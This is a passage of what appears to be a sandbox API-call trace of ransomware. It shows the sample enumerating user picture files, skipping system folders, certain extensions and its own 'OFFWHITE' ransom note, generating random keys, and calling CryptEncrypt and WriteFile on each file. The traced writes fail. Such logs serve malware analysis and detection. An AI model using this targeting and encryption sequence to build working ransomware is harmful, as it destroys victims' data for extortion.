Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.790] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.790] GetProcessHeap () returned 0x500000 [0146.790] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526880 [0146.790] GetProcessHeap () returned 0x500000 [0146.790] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526898 [0146.791] GetProcessHeap () returned 0x500000 [0146.791] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563c80 [0146.791] GetProcessHeap () returned 0x500000 [0146.791] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563d88 [0146.791] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.791] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.791] SystemFunction036 (in: RandomBuffer=0x526880, RandomBufferLength=0x10 | out: RandomBuffer=0x526880) returned 1 [0146.791] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.791] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.791] SystemFunction036 (in: RandomBuffer=0x526898, RandomBufferLength=0x10 | out: RandomBuffer=0x526898) returned 1 [0146.791] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.791] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.791] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563c80*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x563c80*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.791] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.791] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.791] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563d88*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x563d88*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.791] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.791] SetLastError (dwErrCode=0x0) [0146.792] WriteFile (in: hFile=0xffffffff, lpBuffer=0x563c80, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.792] GetLastError () returned 0x6 [0146.792] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae548fb8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae548fb8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2=".") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="..") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="...") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="windows") returned -1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="$recycle.bin") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="rsa") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="ntuser.dat") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="programdata") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="appdata") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="program files") returned 1 [0146.792] lstrcmpiW (lpString1="usertile36.bmp", lpString2="program files (x86)") returned 1 [0146.792] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.792] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile36.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" [0146.792] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.792] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.792] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.792] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.793] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.793] lstrcmpiW (lpString1="usertile36.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.793] GetProcessHeap () returned 0x500000 [0146.793] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547148 [0146.793] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.793] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.793] GetProcessHeap () returned 0x500000 [0146.793] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5268b0 [0146.793] GetProcessHeap () returned 0x500000 [0146.793] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5268c8 [0146.793] GetProcessHeap () returned 0x500000 [0146.793] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563e90 [0146.793] GetProcessHeap () returned 0x500000 [0146.793] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563f98 [0146.793] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.793] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.793] SystemFunction036 (in: RandomBuffer=0x5268b0, RandomBufferLength=0x10 | out: RandomBuffer=0x5268b0) returned 1 [0146.793] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.793] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.793] SystemFunction036 (in: RandomBuffer=0x5268c8, RandomBufferLength=0x10 | out: RandomBuffer=0x5268c8) returned 1 [0146.793] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.793] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.793] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563e90*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x563e90*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.794] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.794] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.794] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563f98*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x563f98*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.794] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.794] SetLastError (dwErrCode=0x0) [0146.794] WriteFile (in: hFile=0xffffffff, lpBuffer=0x563e90, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.794] GetLastError () returned 0x6 [0146.794] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae595272, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae595272, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0146.794] lstrcmpiW (lpString1="usertile37.bmp", lpString2=".") returned 1 [0146.794] lstrcmpiW (lpString1="usertile37.bmp", lpString2="..") returned 1 [0146.794] lstrcmpiW (lpString1="usertile37.bmp", lpString2="...") returned 1 [0146.794] lstrcmpiW (lpString1="usertile37.bmp", lpString2="windows") returned -1 [0146.794] lstrcmpiW (lpString1="usertile37.bmp", lpString2="$recycle.bin") returned 1 [0146.794] lstrcmpiW (lpString1="usertile37.bmp", lpString2="rsa") returned 1 [0146.794] lstrcmpiW (lpString1="usertile37.bmp", lpString2="ntuser.dat") returned 1 [0146.794] lstrcmpiW (lpString1="usertile37.bmp", lpString2="programdata") returned 1 [0146.795] lstrcmpiW (lpString1="usertile37.bmp", lpString2="appdata") returned 1 [0146.795] lstrcmpiW (lpString1="usertile37.bmp", lpString2="program files") returned 1 [0146.795] lstrcmpiW (lpString1="usertile37.bmp", lpString2="program files (x86)") returned 1 [0146.795] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.795] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile37.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" [0146.795] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.795] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.795] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.795] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.795] lstrcmpiW (lpString1="usertile37.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.795] GetProcessHeap () returned 0x500000 [0146.795] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547158 [0146.795] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.796] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.796] GetProcessHeap () returned 0x500000 [0146.796] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5268e0 [0146.796] GetProcessHeap () returned 0x500000 [0146.796] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5268f8 [0146.796] GetProcessHeap () returned 0x500000 [0146.796] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5640a0 [0146.796] GetProcessHeap () returned 0x500000 [0146.796] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5641a8 [0146.796] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.796] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.796] SystemFunction036 (in: RandomBuffer=0x5268e0, RandomBufferLength=0x10 | out: RandomBuffer=0x5268e0) returned 1 [0146.796] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.796] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.796] SystemFunction036 (in: RandomBuffer=0x5268f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5268f8) returned 1 [0146.796] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.796] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.796] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5640a0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5640a0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.796] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.796] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.796] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5641a8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5641a8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.797] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.797] SetLastError (dwErrCode=0x0) [0146.797] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5640a0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.797] GetLastError () returned 0x6 [0146.797] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5bb3cf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5bb3cf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2=".") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="..") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="...") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="windows") returned -1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="$recycle.bin") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="rsa") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="ntuser.dat") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="programdata") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="appdata") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="program files") returned 1 [0146.797] lstrcmpiW (lpString1="usertile38.bmp", lpString2="program files (x86)") returned 1 [0146.797] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.797] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile38.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" [0146.797] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.797] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.797] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0146.797] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.797] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.797] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.797] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.797] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.797] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.797] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.797] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.798] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.798] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.798] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.798] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.798] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.798] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.798] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.798] lstrcmpiW (lpString1="usertile38.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.798] GetProcessHeap () returned 0x500000 [0146.798] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547168 [0146.798] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.802] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.803] GetProcessHeap () returned 0x500000 [0146.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526910 [0146.803] GetProcessHeap () returned 0x500000 [0146.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526928 [0146.803] GetProcessHeap () returned 0x500000 [0146.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5642b0 [0146.803] GetProcessHeap () returned 0x500000 [0146.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5643b8 [0146.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.803] SystemFunction036 (in: RandomBuffer=0x526910, RandomBufferLength=0x10 | out: RandomBuffer=0x526910) returned 1 [0146.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.803] SystemFunction036 (in: RandomBuffer=0x526928, RandomBufferLength=0x10 | out: RandomBuffer=0x526928) returned 1 [0146.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.803] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5642b0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5642b0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.804] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.804] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.804] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5643b8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5643b8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.804] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.804] SetLastError (dwErrCode=0x0) [0146.804] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5642b0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.804] GetLastError () returned 0x6 [0146.804] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5e152c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5e152c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc2ab41, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2=".") returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="..") returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="...") returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="windows") returned -1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="$recycle.bin") returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="rsa") returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="ntuser.dat") returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="programdata") returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="appdata") returned 1 [0146.804] lstrcmpiW (lpString1="usertile39.bmp", lpString2="program files") returned 1 [0146.805] lstrcmpiW (lpString1="usertile39.bmp", lpString2="program files (x86)") returned 1 [0146.805] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.805] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile39.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" [0146.805] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.805] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.805] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.805] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.805] lstrcmpiW (lpString1="usertile39.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.805] GetProcessHeap () returned 0x500000 [0146.805] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526a58 [0146.806] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.806] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.806] GetProcessHeap () returned 0x500000 [0146.806] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526940 [0146.806] GetProcessHeap () returned 0x500000 [0146.806] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526958 [0146.806] GetProcessHeap () returned 0x500000 [0146.806] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5644c0 [0146.806] GetProcessHeap () 